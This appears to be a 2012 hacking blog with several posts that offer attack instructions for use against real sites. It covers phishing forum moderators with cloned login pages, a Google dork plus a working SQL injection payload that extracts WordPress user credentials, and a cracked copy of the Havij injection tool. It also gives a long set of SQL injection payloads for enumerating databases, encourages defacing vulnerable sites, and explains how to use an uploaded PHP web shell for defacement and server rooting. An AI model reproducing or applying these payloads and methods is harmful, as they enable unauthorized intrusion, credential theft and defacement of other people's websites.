Pages

Subscribe:

Thursday, May 24, 2012

How to Hack an SMF Forum

Simple Machine Forum is a popular CMS for community forum. Today I share how to hack an SMF forum.
See following steps:
1. Go to the SMF forum which one you want to hack.
2. Click view>source. (or press ctrl+U)
3. Copy the source code and save it as index.php
4. Now go to the login page of the forum.
5. Again  get the source.
6. Copy the source code and save it as login.php
7. Make a file named passwords.txt which is empty.
8. Upload all three files in a free web hosting site.
9. Make a moderator or owner of that forum login to your forum.
10. After he login or signup you got the password from passwords.txt file.
11. Now login that forum you want to hack with a mod or owner id.

Lolz. Enjoy.

read more "How to Hack an SMF Forum"

Saturday, May 19, 2012

Hack Wordpress Blog:WordPress Calendar SQL Injection Vunerablity

WP Calender is vulnerable to sql injection in wordpress. So Follow my instruction.

1. Go to www.google.com
2. Dork:"powered by WordPress" inurl:"/?event_id="
Search it google and select anyone in a new tab which you comfortable.
3. Now after 'id=' use the code which is given below.
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
8+from+wp_users
4. You get the username and password. Password are in hash form. Decrypt the Hash.
5. You can login in www.site.com/wp-admin

I hope you enjoy the tutorial. :-)

read more "Hack Wordpress Blog:WordPress Calendar SQL Injection Vunerablity"

Thursday, May 17, 2012

Havij 1.152 Pro Version Cracked Free Download

I always prefer manual sql injection. In a word it's best. My SQL Injection Tutorial is here. It is noob friendly and highly detailed.
Though there are many tools of SQL Injection but Havij is the best tool for SQL Injection. This tool is coded by ITSecTeam. The latest version of Havij is 1.152 and it is a pro tool. I bring its cracked version for you. Let's see the latest features of this tool.

What’s New in this version :-
-Webknight WAF bypass added.
-Bypassing mod_security made better
-Unicode support added
-A new method for tables/columns extraction in mssql
-Continuing previous tables/columns extraction made available
-Custom replacement added to the settings
-Default injection value added to the settings (when using %Inject_Here%)
-Table and column prefix added for blind injections
-Custom table and column list added.
-Custom time out added.
-A new md5 cracker site added
-bugfix: a bug releating to SELECT command
-bugfix: finding string column
-bugfix: getting multi column data in mssql
-bugfix: finding mysql column count
-bugfix: wrong syntax in injection string type in MsAccess
-bugfix: false positive results was removed
-bugfix: data extraction in url-encoded pages
-bugfix: loading saved projects
-bugfix: some errors in data extraction in mssql fixed.
-bugfix: a bug in MsAccess when guessing tables and columns
-bugfix: a bug when using proxy
-bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
-bugfix: false positive in finding columns count
-bugfix: when mssql error based method failed
-bugfix: a bug in saving data
-bugfix: Oracle and PostgreSQL detection

Download:


How To Crack:
Open havij.
Now click on register. Write name: Cracked.By.Exidous_For_Opensc.ws
License file :- Contained in the folder name :- HavijKey.lic ( browse the location of the file ) then click on register.
It will be successfully cracked and I hope you will enjoy it.

  
read more "Havij 1.152 Pro Version Cracked Free Download"

Wednesday, May 16, 2012

SQL Injection Problems And Solutions

Some days ago I posted a highly detailed post in SQL Injection. Check the post from here.
When we Sqli in a website we find many problems which are not familiar to us. Today I show you some of this problems and its solutions.

ok so here are some simple solutions of some simple problems (sql injection)

first (if "order by" is not working" )

so you have a vulnerable site

Code: site.com/index.php?id=1

but the problem is that order by is not working

you entered this command:-

Code: site.com/index.php?id=1 order by 1--

<< no eror

Code: site.com/index.php?id=1 order by 5--

<<no eror

Code: site.com/index.php?id=1 order by 100--

<< no eror.. !!!


if you get this problem then use sqli string based and put this command:-


Code:

site.com/index.php?id=1' order by 1--+-

<<no eror

Code: site.com/index.php?id=1' order by 5--+-

<<no eror

Code: site.com/index.php?id=1' order by 100--+-

<<eror

(note): you can see i have also putted a single qoute (') at the place (id=1')<<so be carefull about this


* some times if you get problems by using order by e.g

Code: site.com/index.php?id=1 order by 100--

<<no eror

or

Code: site.com/index.php?id=1 order by 1--

<<eror

then try to change the query like this


Code: site.com/index.php?id=1 order by 1/*
site.com/index.php?id=1 order by 5/*


here are some more quries like:

Code:

-- - ,, --++- ,, -++--,,


* ok while injecting a site if you see that there are no usefull table

like (admin,auth,users,members,login) etc then remember every site have different number of schemas

and there are different tables in every schema and you will get schema names by this command:-

Code:
site.com/index.php?id=1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata


and then tables from different schema using this:-

Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x<hex value of schema name>


column names:-

Code:

site.com/index.php?id=1 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x<hex value of schema name> and table_name=0x<hex value of table name>

hope it will help you
Most sites has the problem when you try to get table names and it gives syntax eror

e.g you used this command:-

Code:

site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables

and it give syntax error like you have error near at line..blah blah

on this condition you have to use different methods until your success

am writing down some of these commands:-

Code:

site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables limit 0,1--

site.com/index.php?id=1 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1

site.com/index.php?id=1 union select 1,2,table_name,4 from information_schema.tables limit 0,1--

hope it will help you


* sometimes while using "union select " you can get this error

Code:

illegal mix of collection

or something like this


then you should use this method:-

Code:

site.com/index.php?id=1 union select 1,2,convert(version() using latin1),4--

current user:-

Code:

site.com/index.php?id=1 union select 1,2,convert(user() using latin1),4--

or

Code:

site.com/index.php?id=1 union select 1,2,unhex(hex(@@version)),4--


Code:

site.com/index.php?id=1 union select 1,2,unhex(hex(user())),4--


mostly unhex(hex)) use to bypass illegal mix of collection error..


if still not working then you should use this:-

Code:

site.com/index.php?id=1 UnIoN SeLeCt 1,2,unhex(hex(@@version))),4--


hope it will help you.. 
read more "SQL Injection Problems And Solutions"

Wednesday, May 9, 2012

SQL Injection Vulnerable Sites For Practice

Hello today I give you a fresh list of sql injection vulnerable sites. Some days ago I post 'Sql Injection Tutorial'. For practice sql injection I will give you this list. So try to do sqli and deface sites.



Happy Hacking !!
read more "SQL Injection Vulnerable Sites For Practice"

Tuesday, May 8, 2012

Restore Deleted or Missing Files From Computer

Hello many times we delete files and after sometime it can be important for us. Then when we get that deleted files?
Here is the solutions. I will provide you a software which can help you to restore/recover your deleted or missing files. I will give the download link below. After Download you will get a .rar files. After extract you find a file named 'Restoration'. Double click of that apps and you can see a window with many options. So happy restoring !




read more "Restore Deleted or Missing Files From Computer"

Sunday, May 6, 2012

404 Not Found Private Shell Tutorial + Free Download

Hello when we got the admin access we need to upload shell. After uploading shell we can index deface of a website, server rooting, cpanel cracking etc. There are many php shell like C99, R57 etc. One of the best and secure shell is 404 not found private shell. Without password you can't open it. So if you upload shell in a server without you none can use it.
So what is it?
You can find this shell from here.
How To Use?
After uploading shell when you open the shell link you can find a page like this:

After move your mouse cursor and fix it when it get a box for giving a password.
After giving the password you will get the shell access.

You can change the password from shell. Find out a line like $auth_pass = "900150983cd24fb0d6963f7d28e17f72"; and from here you can change the password and it must be in hash form.
By default password: abc


read more "404 Not Found Private Shell Tutorial + Free Download"
Related Posts Plugin for WordPress, Blogger...
 

Alexa Rank

Review www.allitemz.blogspot.com on alexa.com

Total Pageviews

Your IP

what is my ip address?
back to top